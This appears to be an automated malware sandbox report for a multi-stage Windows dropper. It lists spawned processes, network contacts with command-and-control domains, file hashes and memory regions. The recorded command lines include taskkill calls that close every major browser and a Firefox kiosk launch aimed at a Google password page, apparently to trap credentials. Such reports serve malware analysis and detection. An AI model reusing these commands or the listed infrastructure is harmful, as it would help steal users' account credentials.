"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"

C:\Users\Admin\AppData\Local\Temp\10107870101\4665ecc86d.exe

"C:\Users\Admin\AppData\Local\Temp\10107870101\4665ecc86d.exe"

C:\Users\Admin\AppData\Local\Temp\10107880101\76e0807425.exe

"C:\Users\Admin\AppData\Local\Temp\10107880101\76e0807425.exe"

C:\Users\Admin\AppData\Local\Temp\10107880101\76e0807425.exe

"C:\Users\Admin\AppData\Local\Temp\10107880101\76e0807425.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 984 -s 508

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1548 -s 1020

C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"

C:\Users\Admin\AppData\Local\Temp\10107890101\a56a18c370.exe

"C:\Users\Admin\AppData\Local\Temp\10107890101\a56a18c370.exe"

C:\Users\Admin\AppData\Local\Temp\10107900101\2a1bc9d8d6.exe

"C:\Users\Admin\AppData\Local\Temp\10107900101\2a1bc9d8d6.exe"

C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"

C:\Users\Admin\AppData\Local\Temp\10107910101\a2a6d35a13.exe

"C:\Users\Admin\AppData\Local\Temp\10107910101\a2a6d35a13.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2648 -s 1204

C:\Users\Admin\AppData\Local\Temp\10107920101\a3f26c3fce.exe

"C:\Users\Admin\AppData\Local\Temp\10107920101\a3f26c3fce.exe"

C:\Users\Admin\AppData\Local\Temp\10107930101\b668242231.exe

"C:\Users\Admin\AppData\Local\Temp\10107930101\b668242231.exe"

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM firefox.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM chrome.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM msedge.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM opera.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM brave.exe /T

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2840.0.994059294\268589583" -parentBuildID 20221007134813 -prefsHandle 1216 -prefMapHandle 1208 -prefsLen 20847 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {6286e659-a441-4882-a98a-0a5ee3cdc511} 2840 "\\.\pipe\gecko-crash-server-pipe.2840" 1292 b6ba358 gpu

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2840.1.650304462\1396595912" -parentBuildID 20221007134813 -prefsHandle 1488 -prefMapHandle 1484 -prefsLen 21708 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {5e3ef407-e24a-4d03-8b85-0c5c0aa613a5} 2840 "\\.\pipe\gecko-crash-server-pipe.2840" 1500 d73f58 socket

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2840.2.1799686709\1027310904" -childID 1 -isForBrowser -prefsHandle 2068 -prefMapHandle 2064 -prefsLen 21746 -prefMapSize 233444 -jsInitHandle 892 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {5363fbb2-0994-4857-95eb-e7a2926154be} 2840 "\\.\pipe\gecko-crash-server-pipe.2840" 2080 19da9058 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2840.3.550897298\1798261468" -childID 2 -isForBrowser -prefsHandle 2896 -prefMapHandle 2888 -prefsLen 26216 -prefMapSize 233444 -jsInitHandle 892 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {6f518dac-b087-470d-9016-eaf44777df06} 2840 "\\.\pipe\gecko-crash-server-pipe.2840" 2916 d62d58 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2840.4.931231338\790430380" -childID 3 -isForBrowser -prefsHandle 3944 -prefMapHandle 3940 -prefsLen 26432 -prefMapSize 233444 -jsInitHandle 892 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {3d67aeed-8ac1-42bd-b36f-e1fad7f623f6} 2840 "\\.\pipe\gecko-crash-server-pipe.2840" 3956 208dad58 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2840.5.1751415405\1535557933" -childID 4 -isForBrowser -prefsHandle 4064 -prefMapHandle 4068 -prefsLen 26432 -prefMapSize 233444 -jsInitHandle 892 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {8717bd4e-e160-44c8-ab53-2f49ecb2f066} 2840 "\\.\pipe\gecko-crash-server-pipe.2840" 4052 208db058 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2840.6.701966344\1456685151" -childID 5 -isForBrowser -prefsHandle 4228 -prefMapHandle 4232 -prefsLen 26432 -prefMapSize 233444 -jsInitHandle 892 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {2376d85f-4b17-4b2b-a188-0facedd92900} 2840 "\\.\pipe\gecko-crash-server-pipe.2840" 4216 20ef7b58 tab

C:\Users\Admin\AppData\Local\Temp\10107940101\e16f9098dd.exe

"C:\Users\Admin\AppData\Local\Temp\10107940101\e16f9098dd.exe"

C:\Users\Admin\AppData\Local\Temp\10107950101\cnntXtU.exe

"C:\Users\Admin\AppData\Local\Temp\10107950101\cnntXtU.exe"

C:\Users\Admin\AppData\Local\Temp\10107960101\nhDLtPT.exe

"C:\Users\Admin\AppData\Local\Temp\10107960101\nhDLtPT.exe"

C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe

"C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\10107970101\Ps7WqSx.exe

"C:\Users\Admin\AppData\Local\Temp\10107970101\Ps7WqSx.exe"

C:\Users\Admin\AppData\Local\Temp\10107980101\FvbuInU.exe

"C:\Users\Admin\AppData\Local\Temp\10107980101\FvbuInU.exe"

C:\Users\Admin\AppData\Local\Temp\10107990101\SvhQA35.exe

"C:\Users\Admin\AppData\Local\Temp\10107990101\SvhQA35.exe"

C:\Users\Admin\AppData\Local\Temp\onefile_3644_133856914229929000\chromium.exe

C:\Users\Admin\AppData\Local\Temp\10107990101\SvhQA35.exe

C:\Users\Admin\AppData\Local\Temp\10108000101\mAtJWNv.exe

"C:\Users\Admin\AppData\Local\Temp\10108000101\mAtJWNv.exe"

C:\Users\Admin\AppData\Local\Temp\10108000101\mAtJWNv.exe

"C:\Users\Admin\AppData\Local\Temp\10108000101\mAtJWNv.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3448 -s 500

C:\Users\Admin\AppData\Local\Temp\10108010101\ce4pMzk.exe

"C:\Users\Admin\AppData\Local\Temp\10108010101\ce4pMzk.exe"

C:\Users\Admin\AppData\Local\Temp\10108020101\MCxU5Fj.exe

"C:\Users\Admin\AppData\Local\Temp\10108020101\MCxU5Fj.exe"

C:\Users\Admin\AppData\Local\Temp\10108020101\MCxU5Fj.exe

"C:\Users\Admin\AppData\Local\Temp\10108020101\MCxU5Fj.exe"

C:\Users\Admin\AppData\Local\Temp\10108020101\MCxU5Fj.exe

"C:\Users\Admin\AppData\Local\Temp\10108020101\MCxU5Fj.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3672 -s 512

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3728 -s 1032

Network

Country Destination Domain Proto
RU 176.113.115.7:80 176.113.115.7 tcp
RU 176.113.115.6:80 176.113.115.6 tcp
RU 176.113.115.7:80 176.113.115.7 tcp
US 8.8.8.8:53 exarthynature.run udp
US 104.21.32.1:443 exarthynature.run tcp
NL 185.156.73.73:80 185.156.73.73 tcp
US 8.8.8.8:53 dawtastream.bet udp
US 8.8.8.8:53 foresctwhispers.top udp
US 8.8.8.8:53 tracnquilforest.life udp
US 8.8.8.8:53 collapimga.fun udp
US 8.8.8.8:53 seizedsentec.online udp
US 8.8.8.8:53 strawpeasaen.fun udp
US 8.8.8.8:53 quietswtreams.life udp
US 8.8.8.8:53 starrynsightsky.icu udp
US 8.8.8.8:53 earthsymphzony.today udp
US 8.8.8.8:53 steamcommunity.com udp
GB 104.82.234.109:443 steamcommunity.com tcp
NL 185.156.73.73:80 185.156.73.73 tcp
US 8.8.8.8:53 farmingtzricks.top udp
US 172.67.220.226:443 farmingtzricks.top tcp
US 172.67.220.226:443 farmingtzricks.top tcp
US 172.67.220.226:443 farmingtzricks.top tcp
US 172.67.220.226:443 farmingtzricks.top tcp
US 172.67.220.226:443 farmingtzricks.top tcp
US 8.8.8.8:53 croprojegies.run udp
US 104.21.80.1:443 croprojegies.run tcp
RU 45.93.20.28:80 45.93.20.28 tcp
N/A 127.0.0.1:49503 tcp
N/A 127.0.0.1:49510 tcp
US 8.8.8.8:53 youtube.com udp
US 8.8.8.8:53 spocs.getpocket.com udp
US 8.8.8.8:53 getpocket.cdn.mozilla.net udp
US 34.120.5.221:443 getpocket.cdn.mozilla.net tcp
US 8.8.8.8:53 prod.pocket.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 prod.ads.prod.webservices.mozgcp.net udp
GB 142.250.187.206:443 youtube.com tcp
US 8.8.8.8:53 prod.pocket.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 prod.ads.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 prod.content-signature-chains.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 youtube.com udp
US 8.8.8.8:53 shavar.prod.mozaws.net udp
US 8.8.8.8:53 youtube.com udp
US 8.8.8.8:53 prod.content-signature-chains.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 shavar.prod.mozaws.net udp
US 8.8.8.8:53 prod.remote-settings.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 prod.remote-settings.prod.webservices.mozgcp.net udp
GB 142.250.187.206:443 youtube.com udp
US 8.8.8.8:53 www.youtube.com udp
GB 142.250.179.238:443 www.youtube.com tcp
US 8.8.8.8:53 youtube-ui.l.google.com udp
US 8.8.8.8:53 youtube-ui.l.google.com udp
GB 142.250.179.238:443 youtube-ui.l.google.com udp
US 8.8.8.8:53 consent.youtube.com udp
GB 216.58.213.14:443 consent.youtube.com tcp
US 8.8.8.8:53 consent.youtube.com udp
US 8.8.8.8:53 firefox-settings-attachments.cdn.mozilla.net udp
US 34.107.152.202:443 firefox-settings-attachments.cdn.mozilla.net tcp
US 8.8.8.8:53 consent.youtube.com udp
US 8.8.8.8:53 attachments.prod.remote-settings.prod.webservices.mozgcp.net udp
GB 216.58.213.14:443 consent.youtube.com udp
US 8.8.8.8:53 attachments.prod.remote-settings.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 www.google.com udp
GB 216.58.204.68:443 www.google.com tcp
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 www.google.com udp
GB 216.58.204.68:443 www.google.com udp
US 8.8.8.8:53 consent.youtube.com udp
US 8.8.8.8:53 consent.youtube.com udp
US 8.8.8.8:53 cobolrationumelawrtewarms.com udp
NL 107.189.27.66:80 cobolrationumelawrtewarms.com tcp
NL 45.154.98.175:6969 tcp
US 8.8.8.8:53 play.google.com udp
GB 142.250.200.14:443 play.google.com tcp
US 8.8.8.8:53 play.google.com udp
US 8.8.8.8:53 play.google.com udp
US 8.8.8.8:53 prod.balrog.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 prod.balrog.prod.cloudops.mozgcp.net udp
GB 142.250.200.14:443 play.google.com udp
US 8.8.8.8:53 ciscobinary.openh264.org udp
NL 2.18.121.79:80 ciscobinary.openh264.org tcp
US 8.8.8.8:53 a19.dscg10.akamai.net udp
US 8.8.8.8:53 a19.dscg10.akamai.net udp
US 8.8.8.8:53 redirector.gvt1.com udp
GB 172.217.16.238:443 redirector.gvt1.com tcp
US 8.8.8.8:53 redirector.gvt1.com udp
US 8.8.8.8:53 redirector.gvt1.com udp
GB 172.217.16.238:443 redirector.gvt1.com udp
US 8.8.8.8:53 r3---sn-aigl6n6s.gvt1.com udp
GB 173.194.3.72:443 r3---sn-aigl6n6s.gvt1.com tcp
US 8.8.8.8:53 r3.sn-aigl6n6s.gvt1.com udp
US 8.8.8.8:53 r3.sn-aigl6n6s.gvt1.com udp
GB 173.194.3.72:443 r3.sn-aigl6n6s.gvt1.com udp
US 8.8.8.8:53 steamcommunity.com udp
GB 104.82.234.109:443 steamcommunity.com tcp
US 172.67.220.226:443 farmingtzricks.top tcp
US 172.67.220.226:443 farmingtzricks.top tcp
US 172.67.220.226:443 farmingtzricks.top tcp
US 172.67.220.226:443 farmingtzricks.top tcp
US 172.67.220.226:443 farmingtzricks.top tcp
US 8.8.8.8:53 consent.youtube.com udp
GB 216.58.213.14:443 consent.youtube.com udp
US 8.8.8.8:53 consent.youtube.com udp
DE 5.75.210.149:443 tcp
US 8.8.8.8:53 circujitstorm.bet udp
US 8.8.8.8:53 explorebieology.run udp
US 8.8.8.8:53 gadgethgfub.icu udp
US 8.8.8.8:53 moderzysics.top udp
US 172.67.189.66:443 moderzysics.top tcp

Files

C:\Users\Admin\AppData\Local\Temp\yJVRHf66T.hta

MD5 2b2ae07bb23617f2f0d316dcce383b8c
SHA1 839721c2ad4a73cfcf76f2514a0b7505008a6f1a
SHA256 e62d1fe3098e2a44c13f031271badc86fa075eb0d17c7b7814b43679c4bab7ae
SHA512 2c281088e14d3ce4d07dd821ddfaf6d0275650bc2845d933bef54c9ba3d28caa6a62b9aa13bc7d06d5a303f341325759065eb35156296d7cbda850b6f96a025b

C:\Users\Admin\AppData\Local\TempZHNWSZTUJO4E7FX0YUKLKS2OB6UEOAJP.EXE

MD5 b5db83c03a37b4cd4746a6080133e338
SHA1 edf3f7e5c3bda89e1382df8f7d0443783426c834
SHA256 8bf5d7ea5c499425488b94f13497a5c3b02997f00ec88fad1b577736fab245df
SHA512 e99da7c87f01dc7459b57d0ce3df799aeb22738840f047c56fb319dc8edddc00ae303ca02916b4b09690df3ff14d559fac44b3e627c6b24498338cfa290fc313

memory/2084-13-0x00000000064D0000-0x000000000698F000-memory.dmp

memory/3068-14-0x0000000000FB0000-0x000000000146F000-memory.dmp

memory/2352-30-0x00000000000A0000-0x000000000055F000-memory.dmp

memory/3068-28-0x0000000000FB0000-0x000000000146F000-memory.dmp

memory/2352-32-0x00000000000A0000-0x000000000055F000-memory.dmp

memory/2352-33-0x00000000000A0000-0x000000000055F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10107870101\4665ecc86d.exe

MD5 d054bcb257edeee50293394229ab1c67
SHA1 80f84013bdc91aa820a0534a297be285e9f0c9f8
SHA256 b4f1440eeb98201163dbc847c76b499538b6e5c05ab178ee255abe190cc7e26e
SHA512 ac52e358cd513783e130c2fd34da7d71bb25039ef4da81921b53be24b21cd5c4d83e0e000c1701b4eec9b9cf0fdd5b14a0801e240ef67efaa60cfb5a100d5f26

memory/2352-49-0x0000000006790000-0x0000000007192000-memory.dmp

memory/2352-51-0x0000000006790000-0x0000000007192000-memory.dmp

memory/3044-50-0x00000000012E0000-0x0000000001CE2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10107880101\76e0807425.exe

MD5 c83ea72877981be2d651f27b0b56efec
SHA1 8d79c3cd3d04165b5cd5c43d6f628359940709a7
SHA256 13783c2615668fba4a503cbefdc18f8bc3d10d311d8dfe12f8f89868ed520482
SHA512 d212c563fdce1092d6d29e03928f142807c465ecaaead4fe9d8949b6f36184b8d067a830361559d59fc00d3bbe88feda03d67b549d54f0ec268e9e75698c1dd0

memory/984-65-0x0000000000BD0000-0x0000000000C48000-memory.dmp

memory/1548-70-0x0000000000400000-0x0000000000465000-memory.dmp

memory/1548-74-0x0000000000400000-0x0000000000465000-memory.dmp

memory/1548-79-0x0000000000400000-0x0000000000465000-memory.dmp

memory/1548-78-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

memory/1548-76-0x0000000000400000-0x0000000000465000-memory.dmp

memory/1548-72-0x0000000000400000-0x0000000000465000-memory.dmp

memory/1548-68-0x0000000000400000-0x0000000000465000-memory.dmp

memory/1548-81-0x0000000000400000-0x0000000000465000-memory.dmp

memory/2352-87-0x00000000000A0000-0x000000000055F000-memory.dmp

memory/2352-93-0x0000000006790000-0x0000000007192000-memory.dmp

memory/3044-94-0x00000000012E0000-0x0000000001CE2000-memory.dmp

memory/3044-95-0x00000000012E0000-0x0000000001CE2000-memory.dmp

memory/2352-96-0x0000000006790000-0x0000000007192000-memory.dmp

memory/1412-97-0x0000000000400000-0x000000000042F000-memory.dmp

memory/1412-99-0x0000000000400000-0x000000000042F000-memory.dmp

memory/3044-98-0x00000000012E0000-0x0000000001CE2000-memory.dmp

memory/1412-103-0x0000000010000000-0x000000001001C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10107890101\a56a18c370.exe

MD5 5d153f73ce1b6a907cf87ddb04ba12b2
SHA1 bfda9ee8501ae0ca60f8e1803efea482085bf699
SHA256 2af376f6a5d706982e3ac08f54d737c4c203bdc2c2c1cbf5f9fc9d4a3a775b2c
SHA512 0f6ef7ff7db227bec5d2a1dcef461313cde66b5ec38f5efd377e533ef15d87eb4aef6cf387ee7c7b63d1142a883bb18577f97dec0dcd818b93891e87f499c102

memory/2352-116-0x00000000000A0000-0x000000000055F000-memory.dmp

memory/2352-123-0x0000000006790000-0x00000000073E1000-memory.dmp

memory/2352-124-0x0000000006790000-0x00000000073E1000-memory.dmp

memory/2552-125-0x0000000000A30000-0x0000000001681000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\CXRG2YQS\service[1].htm

MD5 cfcd208495d565ef66e7dff9f98764da
SHA1 b6589fc6ab0dc82cf12099d1c2d40ab994e8410c
SHA256 5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9
SHA512 31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99

C:\Users\Admin\AppData\Local\Temp\10107900101\2a1bc9d8d6.exe

MD5 8538c195a09066478922511ea1a02edf
SHA1 15e8910df845d897b4bb163caef4c6112570855b
SHA256 d5008972ddedb199731712f9fef3b3aa5a5cd666b600136a9da84656739d4e96
SHA512 60b2c66006b226140f7bf50c94c65088081b311ee92c6dea376a1349ff2380e0ce053a84b2df3be8a54bf7f7bb76f1add8417f4f1bf2fb0681e008cbd5b1725c

memory/2352-144-0x0000000006790000-0x0000000006C3B000-memory.dmp

memory/2352-147-0x0000000006790000-0x00000000073E1000-memory.dmp

memory/2352-148-0x0000000006790000-0x00000000073E1000-memory.dmp

memory/2552-149-0x0000000000A30000-0x0000000001681000-memory.dmp

memory/2352-151-0x00000000000A0000-0x000000000055F000-memory.dmp

memory/2552-152-0x0000000000A30000-0x0000000001681000-memory.dmp

memory/1828-155-0x0000000000400000-0x000000000042F000-memory.dmp

memory/2552-154-0x0000000000A30000-0x0000000001681000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

MD5 83142242e97b8953c386f988aa694e4a
SHA1 833ed12fc15b356136dcdd27c61a50f59c5c7d50
SHA256 d72761e1a334a754ce8250e3af7ea4bf25301040929fd88cf9e50b4a9197d755
SHA512 bb6da177bd16d163f377d9b4c63f6d535804137887684c113cc2f643ceab4f34338c06b5a29213c23d375e95d22ef417eac928822dfb3688ce9e2de9d5242d10

C:\Users\Admin\AppData\Local\Temp\Tar8EB0.tmp

MD5 109cab5505f5e065b63d01361467a83b
SHA1 4ed78955b9272a9ed689b51bf2bf4a86a25e53fc
SHA256 ea6b7f51e85835c09259d9475a7d246c3e764ad67c449673f9dc97172c351673
SHA512 753a6da5d6889dd52f40208e37f2b8c185805ef81148682b269fff5aa84a46d710fe0ebfe05bce625da2e801e1c26745998a41266fa36bf47bc088a224d730cc

memory/2384-230-0x0000000000170000-0x000000000061B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10107910101\a2a6d35a13.exe

MD5 2a48e7b047c5ff096c6dce52d4f26dbb
SHA1 e0d61e10b27131b1c34ade44d1a2117afd2cf099
SHA256 42642893c6a6af226aab5b2cce0875e7affebf7d1001146ddd90234d4c01492d
SHA512 75965d3aa7cda41ecc11f87b1ac2b12283d58650f5b96f2af560aff859ca74c0c0cb26dfc765b4d8318291d8f89fdbb338fb71ddf3f4b63389aedb5e2106165a

memory/2352-248-0x0000000006790000-0x0000000006C3B000-memory.dmp

memory/2648-254-0x00000000012B0000-0x00000000015C4000-memory.dmp

memory/2352-257-0x00000000000A0000-0x000000000055F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10107920101\a3f26c3fce.exe

MD5 338a31056b3b81d48a292a7bf9af67c7
SHA1 f5061e3583ba604b25e316f12fc58f40238d44b4
SHA256 cd1c085a07dc81e4305c2b9ee57e5c0433858c97cb20b1743cf44931c431ccea
SHA512 5bc7823cbd1ab6fa963df8f152d8b6de56af41159f3a736d147f1e5b4dcba3007319e2d2fb13e97f1e8b3cce3ab0d17e31d541be1ab53f8bd05a42316a940abc

memory/1676-276-0x0000000001330000-0x00000000019B7000-memory.dmp

\Users\Admin\AppData\Local\Temp\NBJ5wfAV8NCe\Y-Cleaner.exe

MD5 f49d1aaae28b92052e997480c504aa3b
SHA1 a422f6403847405cee6068f3394bb151d8591fb5
SHA256 81e31780a5f2078284b011c720261797eb8dd85e1b95a657dbce7ac31e9df1f0
SHA512 41f715eea031fd8d7d3a22d88e0199277db2f86be73f830819288c0f0665e81a314be6d356fdc66069cb3f2abf0dd02aaa49ac3732f3f44a533fcec0dfd6f773

C:\Users\Admin\AppData\Local\Temp\10107930101\b668242231.exe

MD5 c0caf5a901b162b6792eab9697827b5d
SHA1 d078ba4ad104c40bf5f2c8afda1cbdf4afc55a84
SHA256 28c182baea1726c3e851405b13f130e02817099758abab86ca9cdc3607b9f89f
SHA512 3fba4eb7a2bc21fc24a6e29495e598efc5f208db030b13de8af43a392a93e3a920e4e8e4b68e10d4dc4a0e8779401ca738172ca9cba2ddc2246854c41a8a58a5

memory/2352-299-0x00000000000A0000-0x000000000055F000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\datareporting\glean\pending_pings\a235d1f1-3c99-4844-9c4d-ef664963c167

MD5 3b911f40561733efbb7ef1f8b0061797
SHA1 e989039184feb69005e0d0cbffe050c6cba4baaf
SHA256 8e8babdfc7de4c3fd983f4a5cfb1a87638eaff965de8471dea78adfce0208ee3
SHA512 e9954c282831a29676acbb091c1ccb5badeba1c98a727d6c57e267e3e4948ce309189ef5edf9196b9ae1cf5e0f6d75e45ea6d69f1c9db518b348f616137e0a7f

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\datareporting\glean\db\data.safe.bin

MD5 6cb779084a4a54c5dfae4f07b5ed7d02
SHA1 8d8e7d52a023403943054af1fabd139bbdfbbc57
SHA256 861578c8f0fbbcfd69a1b342bc26c0f5289ce7b050c9830123f222da7875c101
SHA512 ec3b83b8678c529eb8c44afe3c24be87068d98a3e07c62ffa0f9f625c4cbf6f725100d793a7d33f745c718bc849b760ec11ebfca92dc80ae41078591f342cf35

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\datareporting\glean\pending_pings\83d89f60-d287-48c7-bf80-0c36061ff33d

MD5 711bdc4b9effd3ac9f20f20b49aff77d
SHA1 b8bdf43293526c6ca5c061afafb8879f489a8108
SHA256 46242560590ee1c7099c56cfe3512807686ad578365e43e8f750b4a3acdc8101
SHA512 f7400df4cd75a251e8fd88185a6c002c5c0af36b80a3cbb16ebbafff7586829fc9ad8e1dabd3f0105e0f8c31c3f8678921079c5100d90e2fa79a5468796730cd

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\activity-stream.discovery_stream.json.tmp

MD5 29840b80836cf007cb87c5155f230588
SHA1 00a0dcc50281e0fcbf6cfbc06647a19e3afc565c
SHA256 9967b9a45f6f608bdc8c673518b4df82c01d0c5bd9dc77ccabdaef0ff3fe90f1
SHA512 6e0ded07a22baa41269d93e053e6406ac7bc525c04f1f510b4c64e18bf321181dfa49fb525bde210b5d1742ee94ef350a16dbe04458fdcaad5a17649b2a08617

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\settings\main\ms-language-packs\browser\newtab\asrouter.ftl

MD5 96c542dec016d9ec1ecc4dddfcbaac66
SHA1 6199f7648bb744efa58acf7b96fee85d938389e4
SHA256 7f32769d6bb4e875f58ceb9e2fbfdc9bd6b82397eca7a4c5230b0786e68f1798
SHA512 cda2f159c3565bc636e0523c893b293109de2717142871b1ec78f335c12bad96fc3f62bcf56a1a88abdeed2ac3f3e5e9a008b45e24d713e13c23103acc15e658

C:\Users\Admin\AppData\Local\Temp\10107940101\e16f9098dd.exe

MD5 8043b20e32ff2f0c75e9a3eed0c4bf07
SHA1 5464aa1bc2a91c64cd8c4cbbb6970e8189c158a3
SHA256 69a487512dfb97f08d068d0f9dd3924f42bef46bddd79112cb206b00fc16713e
SHA512 35639c6aad3dd25f606ca72ad108f774b083fa62677772242d357d59add9bba1dc85532d58ae67277d90c04dd4a5189548ca331fe93ee086c31cacbf11b8a18c

memory/2972-453-0x00000000002E0000-0x0000000000738000-memory.dmp

memory/2972-454-0x00000000002E0000-0x0000000000738000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10107950101\cnntXtU.exe

MD5 47177b7fbf1ce282fb87da80fd264b3f
SHA1 d07d2f9624404fa882eb94ee108f222d76bbbd4c
SHA256 e3a190fc0f3e2be612c896ad1bda174271ee57d493f1b39030de1cbb5b7090eb
SHA512 059db11d303355b85e94031a54b0e6bac30bc9e2475bf3fceb9c01063af6f593d455fb54f8893ca37a150b598a9863b04f37056ef589656a6e83da719b330db9

memory/3160-473-0x0000000000390000-0x00000000003A0000-memory.dmp

\??\PIPE\srvsvc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\Desktop\YCL.lnk

MD5 cd2bdaf463be216b1a3cfae3774a6041
SHA1 8a30d9d8e9318feece57eb26dda7defbc5722568
SHA256 1afc2faf495971b14118266518ef19402173260677a40e837f01e5dd88d01e9e
SHA512 7298832a143715727c59330cf588884d53bf83e62a1f995fa6ba2d550b76996e3ce291f3a6e01e97b30cdd0bd7f3c7d6562c47d9c99bcbb3b6f6c52fd104def1

memory/2352-486-0x00000000000A0000-0x000000000055F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10107960101\nhDLtPT.exe

MD5 73636685f823d103c54b30bc457c7f0d
SHA1 597dba03dce00cf6d30b082c80c8f9108ae90ccf
SHA256 1edc123e5a8ea5ce814e2759ee38453404d4af72a3577b0af55e8d99fa38ef1c
SHA512 183d4901a72afc044ef13c3a2cc21f93aefd954665f981c7886afc9019ca7d46f76b3459789dff5721542f2f9e7bbf606d7df68328e772e4c66dc789964f43f7

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\sessionstore-backups\recovery.jsonlz4

MD5 b9fc62c23c5d1e08e35944e848c27c49
SHA1 9063ff1d82ffa3a74f85100d579ddfb794fb49bd
SHA256 2e19f17ad09d2c178fda6ab4612fa62c19a2c7cd9509e179c6236552908b60ea
SHA512 8645116b34bc2cc0a848c0edc0892eb8287e721df37914cb803dbd6b9eebab8cf2972f2b4d2066ee674866b7f7dca19e79026735186b363d25056f853bf5a1ef

memory/2352-530-0x00000000000A0000-0x000000000055F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10107970101\Ps7WqSx.exe

MD5 dab2bc3868e73dd0aab2a5b4853d9583
SHA1 3dadfc676570fc26fc2406d948f7a6d4834a6e2c
SHA256 388bd0f4fe9fca2897b29caac38e869905fd7d43c1512ca3fb9b772fbf2584eb
